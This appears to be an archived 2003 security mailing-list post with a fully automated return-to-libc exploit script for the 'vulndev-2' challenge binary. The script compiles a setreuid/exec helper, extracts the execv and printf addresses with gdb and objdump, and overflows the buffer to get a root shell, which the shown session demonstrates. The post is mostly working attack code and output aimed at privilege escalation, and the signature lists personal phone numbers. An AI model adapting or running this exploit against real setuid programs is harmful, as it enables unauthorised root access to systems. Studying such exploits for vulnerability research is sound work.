Spacewalker and others who did a return-to-libc sploit for vulndev-2. Returning to system() means your command will be executed like this: /bin/sh -c blabla In Linux, /bin/sh is a symlink to bash. Recent versions of bash reset the EUID to the real UID. Many other shells also reset the EUID, since it's pretty common to execute /bin/sh in sploits (that's why shellcodes usually include a setuid-call before the exec, you know). Jon Erickson AKA Jose Ronnick exploited it "for real" though, and here's yet another working return-to-libc exploit, which uses a different approach. As usual, the sploit is fully automated. [je@vudo ~]$ cat expldev-2.sh #!/bin/sh # # Linux/x86 exploit for vulndev-2. Version 2 (return-to-libc). # # 2003-05-25 - Joel Eriksson (je at 0xbadc0ded.org) # [ $# -ge 1 ] && vul=$1 || vul=./vulndev-2 ; shift cat > expldev-2.c << EOF #include <unistd.h> #include <errno.h> int main(void) { setreuid(0, 0); execl("/bin/sh", "sh", NULL); perror("exec"); return 1; } EOF gcc -o '%s ' expldev-2.c buf_size=90 # size of buffer pad_size=2 # align to word boundary num_reps=32 # &bfp - &buf may be > BFSIZE (padding/alignment) cp $vul $vul.tmp # Can't trace a SUID-binary, so use a temporary file. cat > expldev-2.gdb << EOF file $vul.tmp b main r p/x &execv q EOF addr_printf=0x$(objdump -R $vul | awk '$3 == "printf" { print $1 }') addr_execv=$(gdb -q -x expldev-2.gdb | sed -n '$,$s/.* = //p') rm -f expldev-2.gdb $vul.tmp perl -e 'print "\0\0\0\0" . pack("L", '$[addr_execv]')' > db.log arg1=$(perl -e ' print "A" x ('$[buf_size + pad_size]') . pack("L", '$[addr_printf - 4]') x '$num_reps ) $vul $arg1 "" [je@vudo ~]$ ./expldev-2.sh sh-2.05b# whoami root sh-2.05b# exit exit [je@vudo ~]$ -- Joel Eriksson ------------------------------------------------- Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37 Security Research & Systems Development at Bitnux PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1 A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1 -------------------------------------------------
This archive was generated by hypermail 2b30 : Sun May 25 2003 - 20:15:22 PDT